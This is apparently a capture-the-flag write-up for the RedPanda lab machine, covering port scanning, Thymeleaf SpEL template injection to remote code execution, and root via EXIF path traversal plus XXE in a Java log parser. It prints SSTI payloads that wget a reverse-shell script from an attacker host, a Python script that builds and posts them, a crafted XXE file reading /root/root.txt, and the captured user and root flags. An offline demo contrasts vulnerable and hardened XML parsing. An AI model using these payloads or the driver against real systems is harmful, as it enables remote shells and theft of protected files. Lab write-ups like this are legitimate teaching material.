[Meachines] [Easy] RedPanda SSTI + Java Reverse Engineering + XXE Entity Injection

2025-03-05

Information Gathering

IP Address      Open Ports
10.10.11.170    TCP: 22, 8080

$ ip='10.10.11.170'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sat, 01 Mar 2025 06:18:17 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sat, 01 Mar 2025 06:18:17 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 01 Mar 2025 06:18:18 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=3/1%Time=67C2AAC7%P=x86_64-pc-linux-gnu%r(Get
SF:Request,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charset
SF:=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sat,\x2001\x20Mar\x202
SF:025\x2006:18:17\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html
SF:>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\x
SF:20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"wooden
SF:_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepen
SF:\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"styleshe
SF:et\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/cs
SF:s\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20wi
SF:th\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\x
SF:20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20class
SF:='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20ri
SF:ght'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'>\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x2
SF:0\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</d
SF:iv>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x2
SF:0\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Sat
SF:,\x2001\x20Mar\x202025\x2006:18:17\x20GMT\r\nConnection:\x20close\r\n\r
SF:\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/h
SF:tml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\
SF:r\nDate:\x20Sat,\x2001\x20Mar\x202025\x2006:18:18\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20
SF:type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,
SF:\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x2
SF:0{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;
SF:}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height
SF::1px;background-color:#525D76;border:none;}</style></head><body><h1>HTT
SF:P\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>
SF:");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSTI

http://10.10.11.170:8080/


Test payload: *{8*8}

The name parameter of the search form is rendered through a Thymeleaf template, and the selection expression *{8*8} is evaluated as SpEL, so a vulnerable page echoes 64 instead of the literal text.

Command execution through the same parameter. The + characters are URL-encoded spaces; java.lang.Runtime.exec(String) splits its argument on whitespace and does not go through a shell, so pipes or ; would be passed to wget as literal arguments. That is why the download, chmod and execution are three separate requests. rev.sh is a reverse-shell script served from the attacker's HTTP server at 10.10.16.33:9999.

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('wget+http://10.10.16.33:9999/rev.sh').getInputStream())}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod+777+rev.sh').getInputStream())}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('./rev.sh').getInputStream())}
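A small driver for the injection above, added here as an example (it is not code from the write-up). It assumes the search form is submitted as POST /search with the vulnerable parameter name (the parameter name is the write-up's; the path and method are assumptions), and reuses the attacker address 10.10.16.33:9999 and the file name rev.sh from the requests above. Besides building and encoding the payload it makes explicit why the chain is three requests rather than one:

```python
"""Payload builder for the Thymeleaf/SpEL injection in the `name` parameter.

Added example, not part of the original write-up. Assumed: the endpoint is
POST /search (the parameter name `name` and the gadget are the write-up's).
"""
import urllib.parse
import urllib.request

# SpEL gadget from the write-up: run a command through java.lang.Runtime and
# return its stdout as a String so it is rendered into the page.
GADGET = ("*{T(org.apache.commons.io.IOUtils).toString("
          "T(java.lang.Runtime).getRuntime().exec('{cmd}').getInputStream())}")

PROBE = "*{8*8}"  # arithmetic probe; a vulnerable page renders 64


def build_payload(cmd):
    """Wrap a command in the gadget.

    Runtime.exec(String) tokenises on whitespace and never invokes a shell,
    so ';', '|' or '&&' are not operators here. Each command of the chain
    therefore goes out in its own request.
    """
    if "'" in cmd:
        raise ValueError("a single quote would terminate the SpEL string literal")
    return GADGET.replace("{cmd}", cmd)


def form_body(payload):
    """URL-encode the form body. Spaces become '+', which is what shows up as
    'wget+http://...' in the raw requests; the server decodes them again."""
    return urllib.parse.urlencode({"name": payload})


def stage_commands(attacker="10.10.16.33:9999", script="rev.sh"):
    """The three-request chain from the write-up, in order."""
    return [
        "wget http://%s/%s" % (attacker, script),
        "chmod 777 %s" % script,
        "./%s" % script,
    ]


def post(url, payload, timeout=10):
    """Send one payload and return the response body (network call; not used
    by the offline checks)."""
    req = urllib.request.Request(
        url, data=form_body(payload).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    print("probe body:", form_body(PROBE))
    for cmd in stage_commands():
        print(form_body(build_payload(cmd)))
```

Send the probe first and look for 64 in the response; only then run the three staged commands in order, waiting for the listener to catch the shell after the last one.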


User.txt

82505dbb5ab9adee0a0421d9b63840a7

Privilege Escalation: Java Reverse Engineering && XXE

Copy the log-parser jar off the box so it can be decompiled locally:

$ scp -i ./id_rsa woodenk@10.10.11.170:/opt/credit-score/LogParser/final/target/final-1.0-jar-with-dependencies.jar ./


The routine parses the log file /opt/panda_search/redpanda.log, picks out the requests for JPG images, reads each image's Artist attribute, and updates the view counter in the matching /credits/<Artist>_creds.xml file.

The Artist value is concatenated into that path without sanitisation, so an Artist tag containing ../ makes the parser open an XML file of our choosing, and because its XML parser resolves external entities that file can carry an XXE payload. The parser runs with enough privilege to read /root/root.txt, so the entity can pull in the root flag.


As for /opt/panda_search/redpanda.log: the current user is in the logs group, which means we are allowed to modify it.

1. Add an Artist tag to /tmp/exp.jpg

$ exiftool -Artist="/../../../../../../../../../tmp/exp" exp.jpg

The -Artist tag sets (or reads) the image's "Artist" metadata, normally stored in the EXIF or XMP fields, which names the creator or owner of the image. Here it is just a string the parser splices into a file path: /credits/ + /../../../../../../../../../tmp/exp + _creds.xml resolves to /tmp/exp_creds.xml.

2. Create /tmp/exp_creds.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY file SYSTEM "/root/root.txt"> ]>
<credits>
 <author>xxx</author>
  <image>
    <uri>/../../../../../../tmp/exp.jpg</uri>
    <views>0</views>
    <data>&file;</data>
  </image>
  <totalviews>0</totalviews>
</credits>

3. Append the payload to /opt/panda_search/redpanda.log to trigger the processing condition. The fields are separated by ||; the parser keys on the last one, the request URI, and only handles .jpg requests, so the traversal in the URI points it at /tmp/exp.jpg:

$ echo "200||test||test||/../../../../../../../../../tmp/exp.jpg" >> /opt/panda_search/redpanda.log

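The three steps above, reproduced offline in Python as an added example (this is not the machine's Java parser, whose source appears only in the screenshots). It models the parser's path handling as described in this write-up, then parses the crafted creds file twice: once with external entities enabled, as the target's parser evidently does, and once with them disabled, which is the fix. Assumed, not from the page: the image base directory, that the log fields are || separated with the URI last, and that non-.jpg lines are ignored. The secret file and the creds file are created in a temporary directory, so nothing touches /root or /credits:

```python
"""Model of the log parser's path handling plus an offline XXE demonstration.

Added example, not the machine's own code. Assumptions are marked below.
"""
import os
import tempfile
import xml.sax
import xml.sax.handler

CREDITS_DIR = "/credits"                  # path from the write-up
IMAGE_BASE = "/opt/panda_search/static"   # assumption: the real prefix is not shown

# Same structure as the crafted /tmp/exp_creds.xml above; {target} is the file
# the external entity points at (a temp file here, /root/root.txt on the box).
XXE_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY file SYSTEM "{target}"> ]>
<credits>
  <author>xxx</author>
  <image>
    <uri>/../../../../../../tmp/exp.jpg</uri>
    <views>0</views>
    <data>&file;</data>
  </image>
  <totalviews>0</totalviews>
</credits>
"""


def parse_log_line(line):
    """Return (status, uri) for a '||'-separated log line, or None when the
    request is not for a .jpg (the parser only processes image requests)."""
    fields = line.rstrip("\n").split("||")
    if len(fields) < 4:
        return None
    status, uri = fields[0], fields[-1]
    if not uri.lower().endswith(".jpg"):
        return None
    return status, uri


def image_path(uri):
    """Unsanitised concatenation: '../' in the logged URI escapes IMAGE_BASE."""
    return os.path.normpath(IMAGE_BASE + uri)


def creds_path(artist):
    """Unsanitised concatenation: '../' in the EXIF Artist tag escapes CREDITS_DIR."""
    return os.path.normpath(CREDITS_DIR + "/" + artist + "_creds.xml")


class _DataCollector(xml.sax.handler.ContentHandler):
    """Collects the text inside <data>, i.e. whatever &file; expanded to."""

    def __init__(self):
        super().__init__()
        self.in_data = False
        self.chunks = []

    def startElement(self, name, attrs):
        self.in_data = name == "data"

    def endElement(self, name):
        if name == "data":
            self.in_data = False

    def characters(self, content):
        if self.in_data:
            self.chunks.append(content)


def parse_creds(path, resolve_external):
    """Parse a *_creds.xml file. resolve_external=True mirrors the target's
    parser (external general entities are fetched and inlined); False is the
    hardened setting, under which &file; expands to nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    handler = _DataCollector()
    parser.setContentHandler(handler)
    parser.parse(path)
    return "".join(handler.chunks)


def demo():
    """Offline run: a temp file stands in for /root/root.txt and the crafted
    creds file for /tmp/exp_creds.xml. Returns what leaked in each mode."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "root.txt")
        with open(secret, "w") as f:
            f.write("stand-in-for-root-flag\n")  # constructed, not the real flag
        crafted = os.path.join(tmp, "exp_creds.xml")
        with open(crafted, "w") as f:
            f.write(XXE_TEMPLATE.format(target=secret))
        return {
            "vulnerable": parse_creds(crafted, True).strip(),
            "hardened": parse_creds(crafted, False).strip(),
        }


if __name__ == "__main__":
    _, uri = parse_log_line("200||test||test||/../../../../../../../../../tmp/exp.jpg")
    print("image read from  :", image_path(uri))
    print("creds file opened:", creds_path("/../../../../../../../../../tmp/exp"))
    print(demo())
```

The two normpath calls show both traversals collapsing to /tmp/exp.jpg and /tmp/exp_creds.xml, and demo() shows the same crafted XML leaking the file under a parser that resolves external entities while yielding nothing once that feature is turned off; in Java the equivalent is disabling DOCTYPE declarations or external-general-entities on the DocumentBuilderFactory.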

Root.txt

4f85a578d0e89b0aa9ad4f525fd3213b

